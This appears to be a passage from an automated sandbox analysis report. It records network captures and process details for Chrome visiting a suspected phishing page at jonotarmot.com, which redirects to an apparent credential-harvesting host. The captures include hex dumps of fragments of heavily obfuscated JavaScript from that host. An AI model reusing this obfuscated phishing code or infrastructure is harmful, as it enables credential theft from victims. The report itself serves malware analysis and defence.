Dec 18, 2024 20:21:50.184334993 CET	1236	IN	Data Raw: 35 3a c7 7a 7a 29 b1 87 16 b7 f5 28 68 9c b3 af 87 c7 93 33 ca 46 49 a8 ee 12 81 d9 48 bc b0 4f 84 f0 cd e0 db ad 1f c8 34 31 6c 37 3b 2e 5d 36 72 9e 1a 8e d4 ac 7a 95 d5 6d 13 40 27 ce 57 f6 7b 8b 18 21 9a 2e 79 2c df ee 18 8a 0c 37 3e 12 f6 b4 Data Ascii: 5:zz)(h3FIHO41l7;.]6rzm@'W{!.y,7>;gpS?TO?d1+(JPxzUTbsd.Yt6,9s,bZ?"%ai%(8@Loz n vb>s#Ui v9k:L,Ti4BR1
Dec 18, 2024 20:21:50.184348106 CET	1236	IN	Data Raw: 41 5e a3 c2 31 18 25 a6 ab 93 16 a4 a1 51 ab 56 6a 51 b0 b1 36 56 8b c9 c0 7f 80 fa 16 ac a1 3c 1a 46 c8 38 c0 21 85 a6 b8 33 4e 2c 67 8b 7b fc d8 3d 95 7b 58 1f f0 0e b6 f1 f9 9c d5 14 7d 69 26 1e 29 ad 32 51 1b 72 79 a2 24 3b 08 f7 2d d8 d1 98 Data Ascii: A^1%QVjQ6V<F8!3N,g{={X}i&)2Qry$;-9'%7oRs'Ig@vYHBm@s0ovXvok&6ju<<l[p/i~O_b4{C RvU8b]EV%%+4C
Dec 18, 2024 20:21:50.184678078 CET	1236	IN	Data Raw: cf a7 47 32 12 df 4d 18 99 5c d5 d0 f1 ce 13 45 a8 49 95 9d 4c cf a6 14 c2 5f a1 21 ee db d3 5b e3 17 f6 02 f0 29 87 ac 15 8b 85 69 8d 47 a0 31 f8 39 8e 28 3a 9d b8 13 9d 23 d1 63 45 50 26 6b 2b 15 63 64 b8 93 5f a6 73 ea 3a 51 21 5d 4b 3b f4 dd Data Ascii: G2M\EIL_![)iG19(:#cEP&k+cd_s:Q!]K;gQyB] }A*4XXz<b8kk(w\|-<"]v_cd\o._d\|dPe!b69))d!cPc']7.xkj.
Dec 18, 2024 20:21:50.184690952 CET	896	IN	Data Raw: 6d 33 70 36 7f 23 95 19 db e4 1e 02 78 76 60 e9 50 92 34 05 64 3f db 10 ea c2 44 71 1c 31 88 82 96 9b b9 c4 28 ce 9c a2 99 a1 d2 c6 a3 71 ca b5 45 03 47 18 7a b0 51 7d 06 2e 3f 3e 57 27 52 93 f9 9d d1 46 32 d3 7a 70 bd 45 d3 bc b4 70 6e b3 57 39 Data Ascii: m3p6#xv`P4d?Dq1(qEGzQ}.?>W'RF2zpEpnW9w;_[\|kZ"!7l7`rthIDgJ!5ICrklc>ufU5J6HtE\EqQB~mXWvSD%cip}`~'
Dec 18, 2024 20:21:50.185064077 CET	1236	IN	Data Raw: 8c 5f 0e 01 93 d2 cc a6 9e 7b 8a de 16 6b e8 49 af dc 3c 18 ec 83 56 db 63 77 2f 55 6e 5f 3f 0e 7f a3 94 bb d4 d1 4c c2 b9 75 0a 6e ed 17 22 df 80 8a 5b 02 c0 43 96 51 ad 66 d4 6e 89 ad 2a 36 00 15 7c 0d d9 78 fb dc ee 4e 7a 06 37 4a 7c 31 f3 67 Data Ascii: _{kI<Vcw/Un_?Lun"[CQfn*6\|xNz7J\|1gr71m^#SRt=CS}kvm75Yt\\|{{F?-)g_&m0G&24>n<OsIE!:%u%wG~
Dec 18, 2024 20:21:50.185075998 CET	1236	IN	Data Raw: aa f7 43 e7 2b c2 f3 5a c0 8e cd c4 97 0e 28 c6 3a 9a 5b b7 66 13 32 ba 8a 30 5d cf 66 46 49 ab e8 91 65 88 9d 0b 2a 47 62 61 80 46 17 d4 89 b0 eb 8b ec db 6e b4 fc 51 3f ad 8c 63 17 b6 8a 18 e4 33 d0 09 e8 19 7a 4e c5 65 bb 1f 29 30 81 78 1a 4b Data Ascii: C+Z(:[f20]fFIeGbaFnQ?c3zNe)0xK <=8Y(QoJRN\nt`GYWh5\\|EjZWR0j;TV)9z~Z7g^&j5N))c6m"K%d{0
Dec 18, 2024 20:21:50.185277939 CET	1236	IN	Data Raw: 9f 99 6d 8c 95 55 c3 32 ab 25 36 36 16 de 0c fd b4 c0 2b bc 9b 15 bf 4d 1d 85 c8 bf e4 cf 42 eb 9d 89 a6 7e 92 85 26 b8 6f 3f 26 29 d6 96 14 b5 63 2a e1 88 17 3f 22 25 22 e8 20 87 56 7f 9a 83 8e f9 64 d0 34 0f 5e 15 97 27 f7 a7 b7 e5 62 36 eb ec Data Ascii: mU2%66+MB~&o?&)c?"%" Vd4^'b6%t#B/rx:E4:ApT8[9FBMGA"$^%rNc?:xTJ,\y:J7c~~[&zDnHyvP86E#
Dec 18, 2024 20:21:50.185446978 CET	1236	IN	Data Raw: 3f 4d 6e 5f d8 0e 28 e4 6d 66 e9 5a e2 8d b0 31 e6 7d 56 c1 bc ad c6 4a 6f 67 af ad 91 b2 79 39 d3 bd a6 80 7e ac db cb ab 25 b5 a8 47 c5 2c a9 b5 c0 43 de 32 5f 24 6d 8f 57 45 99 6c 6a ee e9 7d b0 15 79 ca f7 e5 3f e7 16 96 d7 08 49 4e 34 7e 8e Data Ascii: ?Mn_(mfZ1}VJogy9~%G,C2_$mWElj}y?IN4~bJAT@x`:+Nf?w[\{9p9]-S](4c/o[8/.`Z&C/YFP\|CRq^J[rTa'5]0~@2FU(e]hv#7
Dec 18, 2024 20:21:50.185458899 CET	1236	IN	Data Raw: 6f b0 4e ce bb 9b df 20 9b 1a 52 52 3e 11 b2 d3 8e b5 36 40 18 78 8d 25 8e 8f 67 d0 d3 8b 2e bf 6b d2 b3 f4 36 15 13 9b f9 e7 a5 e1 64 63 fa 9f 43 92 bb 15 ff 0c 9b f7 43 cd 79 40 62 dc a4 36 c7 08 4f b9 8f 1b f6 96 87 09 82 67 8b 3d 27 9c ab d3 Data Ascii: oN RR>6@x%g.k6dcCCy@b6Og='LYwFgEOAjyta7_^)5?w r{+AZH:fC=k7TM<~{T0}~==69dChQ`jZO#&!^/"GNoU
Dec 18, 2024 20:21:50.304820061 CET	1236	IN	Data Raw: 67 b8 41 4a cd eb 5a 8c 4c 0e fe d2 7d d4 31 ff ee 8f 46 bb 49 73 f9 bf 1f 6d 2d b9 7e ac 9b f9 9c b1 aa 3b 92 63 12 9d b3 87 bf e8 2b 7d 71 e1 67 95 a3 13 a9 36 1f 5f 72 68 7b 59 5d 34 c7 ba 6c 04 bf 21 26 82 60 f7 70 a8 b9 15 8d d9 a9 6c 43 0a Data Ascii: gAJZL}1FIsm-~;c+}qg6_rh{Y]4l!&`plChUV'q?x{33NJ8VO>%l2<:lWI~m_79^#SnET`qJol$#xG@&/pPEHBlQ7
Dec 18, 2024 20:21:51.122288942 CET	387	OUT	GET /favicon.ico HTTP/1.1 Host: jonotarmot.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://jonotarmot.com/dcs/ms_doc.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Dec 18, 2024 20:21:51.518786907 CET	187	IN	HTTP/1.1 200 OK date: Wed, 18 Dec 2024 19:21:51 GMT server: Apache last-modified: Sat, 02 Nov 2024 17:18:17 GMT accept-ranges: bytes content-length: 0 content-type: image/x-icon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49724	198.54.120.20	80	4456	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 20:21:51.788273096 CET	278	OUT	GET /favicon.ico HTTP/1.1 Host: jonotarmot.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Dec 18, 2024 20:21:53.082314014 CET	187	IN	HTTP/1.1 200 OK date: Wed, 18 Dec 2024 19:21:52 GMT server: Apache last-modified: Sat, 02 Nov 2024 17:18:17 GMT accept-ranges: bytes content-length: 0 content-type: image/x-icon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	198.54.120.20	80	4456	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 20:22:04.945925951 CET	233	IN	HTTP/1.1 408 Request Time-out Content-length: 110 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49725	198.54.120.20	80	4456	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 20:22:07.957920074 CET	233	IN	HTTP/1.1 408 Request Time-out Content-length: 110 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>
Dec 18, 2024 20:22:52.961270094 CET	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49757	134.209.237.210	443	4456	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 19:22:06 UTC	732	OUT	GET /?username=57t7o2@ydtohcj.io HTTP/1.1 Host: 0nline1.most-secure.ink Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://jonotarmot.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-18 19:22:07 UTC	181	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 19:22:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2024-12-18 19:22:07 UTC	16203	IN	Data Raw: 37 37 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 75 35 28 75 2c 61 29 7b 76 61 72 20 51 3d 61 30 75 34 28 29 3b 72 65 74 75 72 6e 20 61 30 75 35 3d 66 75 6e 63 74 69 6f 6e 28 6f 2c 67 29 7b 6f 3d 6f 2d 30 78 39 34 3b 76 61 72 20 6b 3d 51 5b 6f 5d 3b 72 65 74 75 72 6e 20 6b 3b 7d 2c 61 30 75 35 28 75 2c 61 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 75 2c 61 29 7b 76 61 72 20 67 31 3d 61 30 75 35 2c 51 3d 75 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 6f 3d 70 61 72 73 65 49 6e 74 28 67 31 28 30 78 31 37 Data Ascii: 77f5<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0u5(u,a){var Q=a0u4();return a0u5=function(o,g){o=o-0x94;var k=Q[o];return k;},a0u5(u,a);}(function(u,a){var g1=a0u5,Q=u();while(!![]){try{var o=parseInt(g1(0x17
2024-12-18 19:22:07 UTC	14514	IN	Data Raw: 27 27 2c 51 53 5b 51 78 5d 3d 2f 2e 2f 5b 51 78 5d 29 2c 51 53 5b 6b 6b 28 30 78 31 39 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 51 4e 3d 21 30 78 30 2c 6e 75 6c 6c 3b 7d 2c 51 53 5b 51 78 5d 28 27 27 29 2c 21 51 4e 3b 7d 29 3b 69 66 28 21 51 44 7c 7c 21 51 62 7c 7c 51 41 29 7b 69 66 28 6b 72 28 30 78 33 33 34 29 21 3d 3d 6b 72 28 30 78 32 30 33 29 29 7b 76 61 72 20 51 43 3d 2f 2e 2f 5b 51 78 5d 2c 51 4d 3d 51 58 28 51 78 2c 27 27 5b 51 65 5d 2c 66 75 6e 63 74 69 6f 6e 28 51 4e 2c 51 53 2c 51 50 2c 51 4f 2c 51 79 29 7b 76 61 72 20 6b 4c 3d 6b 72 2c 51 64 3d 51 53 5b 27 65 78 65 63 27 5d 3b 72 65 74 75 72 6e 20 51 64 3d 3d 3d 51 6c 7c 7c 51 64 3d 3d 3d 51 7a 5b 6b 4c 28 30 78 31 39 34 29 5d 3f 51 44 26 26 21 51 79 3f 7b 27 64 6f 6e Data Ascii: '',QS[Qx]=/./[Qx]),QS[kk(0x194)]=function(){return QN=!0x0,null;},QS[Qx](''),!QN;});if(!QD\|\|!Qb\|\|QA){if(kr(0x334)!==kr(0x203)){var QC=/./[Qx],QM=QX(Qx,''[Qe],function(QN,QS,QP,QO,Qy){var kL=kr,Qd=QS['exec'];return Qd===Ql\|\|Qd===Qz[kL(0x194)]?QD&&!Qy?{'don
2024-12-18 19:22:07 UTC	16384	IN	Data Raw: 38 30 30 30 0d 0a 49 74 65 72 61 74 6f 72 50 72 6f 74 6f 74 79 70 65 27 3a 51 45 2c 27 42 55 47 47 59 5f 53 41 46 41 52 49 5f 49 54 45 52 41 54 4f 52 53 27 3a 51 78 7d 3b 7d 2c 30 78 31 61 37 37 3a 66 75 6e 63 74 69 6f 6e 28 51 52 29 7b 76 61 72 20 72 44 3d 61 30 75 35 3b 69 66 28 27 7a 58 55 69 61 27 21 3d 3d 27 7a 58 55 69 61 27 29 72 65 74 75 72 6e 20 75 37 28 75 77 29 3f 75 57 28 75 58 29 3a 75 50 28 75 64 2c 7b 7d 29 3b 65 6c 73 65 20 51 52 5b 72 44 28 30 78 33 62 64 29 5d 3d 7b 7d 3b 7d 2c 30 78 31 62 33 30 3a 66 75 6e 63 74 69 6f 6e 28 51 52 2c 51 46 2c 51 5a 29 7b 76 61 72 20 72 62 3d 61 30 75 35 2c 51 45 3d 51 5a 28 30 78 32 30 38 34 29 3b 51 52 5b 72 62 28 30 78 33 62 64 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 51 63 29 7b 76 61 72 20 72 43 3d 72 62 Data Ascii: 8000IteratorPrototype':QE,'BUGGY_SAFARI_ITERATORS':Qx};},0x1a77:function(QR){var rD=a0u5;if('zXUia'!=='zXUia')return u7(uw)?uW(uX):uP(ud,{});else QR[rD(0x3bd)]={};},0x1b30:function(QR,QF,QZ){var rb=a0u5,QE=QZ(0x2084);QR[rb(0x3bd)]=function(Qc){var rC=rb
2024-12-18 19:22:07 UTC	16384	IN	Data Raw: 4c 70 3d 61 30 75 35 2c 51 45 3d 51 5a 28 30 78 32 31 31 39 29 2c 51 63 3d 51 5a 28 30 78 31 35 63 61 29 5b 4c 70 28 30 78 34 34 38 29 5d 3b 51 52 5b 4c 70 28 30 78 33 62 64 29 5d 3d 51 45 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 4c 48 3d 4c 70 2c 51 6c 3d 51 63 28 4c 48 28 30 78 33 61 39 29 2c 27 67 27 29 3b 72 65 74 75 72 6e 27 62 27 21 3d 3d 51 6c 5b 4c 48 28 30 78 31 39 34 29 5d 28 27 62 27 29 5b 4c 48 28 30 78 33 66 61 29 5d 5b 27 61 27 5d 7c 7c 27 62 63 27 21 3d 3d 27 62 27 5b 27 72 65 70 6c 61 63 65 27 5d 28 51 6c 2c 4c 48 28 30 78 32 34 33 29 29 3b 7d 29 3b 7d 2c 30 78 63 66 30 3a 66 75 6e 63 74 69 6f 6e 28 51 52 2c 51 46 2c 51 5a 29 7b 76 61 72 20 4c 4a 3d 61 30 75 35 2c 51 45 3d 51 5a 28 30 78 31 37 35 66 29 2c 51 63 3d 54 79 70 65 45 72 Data Ascii: Lp=a0u5,QE=QZ(0x2119),Qc=QZ(0x15ca)[Lp(0x448)];QR[Lp(0x3bd)]=QE(function(){var LH=Lp,Ql=Qc(LH(0x3a9),'g');return'b'!==Ql[LH(0x194)]('b')[LH(0x3fa)]['a']\|\|'bc'!=='b'['replace'](Ql,LH(0x243));});},0xcf0:function(QR,QF,QZ){var LJ=a0u5,QE=QZ(0x175f),Qc=TypeEr
2024-12-18 19:22:07 UTC	8	IN	Data Raw: 79 27 3a 30 78 31 0d 0a Data Ascii: y':0x1
2024-12-18 19:22:07 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 2c 27 66 6f 72 63 65 64 27 3a 51 63 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 52 33 3d 52 32 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 6e 65 77 20 44 61 74 65 28 4e 61 4e 29 5b 52 33 28 30 78 31 34 33 29 5d 28 29 7c 7c 30 78 31 21 3d 3d 44 61 74 65 5b 52 33 28 30 78 32 62 37 29 5d 5b 52 33 28 30 78 31 34 33 29 5d 5b 52 33 28 30 78 39 36 29 5d 28 7b 27 74 6f 49 53 4f 53 74 72 69 6e 67 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 78 31 3b 7d 7d 29 3b 7d 29 7d 2c 7b 27 74 6f 4a 53 4f 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 51 76 29 7b 76 61 72 20 52 34 3d 52 32 3b 69 66 28 52 34 28 30 78 33 31 30 29 3d 3d 3d 52 34 28 30 78 32 30 66 29 29 72 65 74 75 72 6e 20 51 63 28 75 45 28 75 65 29 2c 30 78 38 2c 2d 30 78 31 29 3b Data Ascii: 4000,'forced':Qc(function(){var R3=R2;return null!==new Date(NaN)[R3(0x143)]()\|\|0x1!==Date[R3(0x2b7)][R3(0x143)][R3(0x96)]({'toISOString':function(){return 0x1;}});})},{'toJSON':function(Qv){var R4=R2;if(R4(0x310)===R4(0x20f))return Qc(uE(ue),0x8,-0x1);
2024-12-18 19:22:07 UTC	8	IN	Data Raw: 72 74 73 27 5d 3d 0d 0a Data Ascii: rts']=
2024-12-18 19:22:07 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 66 75 6e 63 74 69 6f 6e 28 6f 33 2c 6f 34 29 7b 76 61 72 20 46 37 3d 46 36 3b 69 66 28 6f 33 3c 6f 34 29 74 68 72 6f 77 20 6e 65 77 20 6f 32 28 46 37 28 30 78 33 64 38 29 29 3b 72 65 74 75 72 6e 20 6f 33 3b 7d 3b 7d 65 6c 73 65 7b 76 61 72 20 51 4a 3d 51 64 28 51 6a 2c 51 70 2c 51 48 2c 51 42 2c 51 6a 21 3d 3d 51 79 29 3b 69 66 28 51 4a 5b 46 36 28 30 78 32 34 30 29 5d 29 72 65 74 75 72 6e 20 51 4a 5b 46 36 28 30 78 32 37 64 29 5d 3b 7d 7d 76 61 72 20 51 47 3d 51 4b 28 51 70 2c 52 65 67 45 78 70 29 2c 51 73 3d 51 70 5b 46 36 28 30 78 32 33 65 29 5d 2c 51 6d 3d 28 51 70 5b 27 69 67 6e 6f 72 65 43 61 73 65 27 5d 3f 27 69 27 3a 27 27 29 2b 28 51 70 5b 46 36 28 30 78 32 32 64 29 5d 3f 27 6d 27 3a 27 27 29 2b 28 51 70 5b 46 36 28 30 78 32 33 Data Ascii: 4000function(o3,o4){var F7=F6;if(o3<o4)throw new o2(F7(0x3d8));return o3;};}else{var QJ=Qd(Qj,Qp,QH,QB,Qj!==Qy);if(QJ[F6(0x240)])return QJ[F6(0x27d)];}}var QG=QK(Qp,RegExp),Qs=Qp[F6(0x23e)],Qm=(Qp['ignoreCase']?'i':'')+(Qp[F6(0x22d)]?'m':'')+(Qp[F6(0x23
2024-12-18 19:22:07 UTC	8	IN	Data Raw: 57 3d 5b 30 78 30 0d 0a Data Ascii: W=[0x0
2024-12-18 19:22:07 UTC	16384	IN	Data Raw: 62 66 66 38 0d 0a 2c 30 78 35 32 64 63 65 37 32 39 5d 2c 75 78 3d 5b 30 78 30 2c 30 78 33 38 34 39 35 61 62 35 5d 3b 66 75 6e 63 74 69 6f 6e 20 75 44 28 51 52 2c 51 46 29 7b 76 61 72 20 46 73 3d 46 4e 2c 51 5a 3d 66 75 6e 63 74 69 6f 6e 28 51 58 29 7b 76 61 72 20 46 47 3d 61 30 75 35 3b 66 6f 72 28 76 61 72 20 51 41 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 51 58 5b 27 6c 65 6e 67 74 68 27 5d 29 2c 51 57 3d 30 78 30 3b 51 57 3c 51 58 5b 46 47 28 30 78 32 63 62 29 5d 3b 51 57 2b 2b 29 7b 76 61 72 20 51 78 3d 51 58 5b 46 47 28 30 78 33 61 64 29 5d 28 51 57 29 3b 69 66 28 51 78 3e 30 78 37 66 29 72 65 74 75 72 6e 20 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 28 29 5b 46 47 28 30 78 33 61 62 29 5d 28 51 58 29 3b 51 41 5b 51 57 5d 3d 51 78 3b 7d 72 65 Data Ascii: bff8,0x52dce729],ux=[0x0,0x38495ab5];function uD(QR,QF){var Fs=FN,QZ=function(QX){var FG=a0u5;for(var QA=new Uint8Array(QX['length']),QW=0x0;QW<QX[FG(0x2cb)];QW++){var Qx=QX[FG(0x3ad)](QW);if(Qx>0x7f)return new TextEncoder()[FG(0x3ab)](QX);QA[QW]=Qx;}re

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 1852, Parent PID: 5488

General

Target ID:	0
Start time:	14:21:35
Start date:	18/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4456, Parent PID: 1852

General

Target ID:	2
Start time:	14:21:41
Start date:	18/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2008,i,1113165676630254317,7263189473961019682,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6284, Parent PID: 5488

General

Target ID:	3
Start time:	14:21:47
Start date:	18/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://jonotarmot.com/dcs/ms_doc.html"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly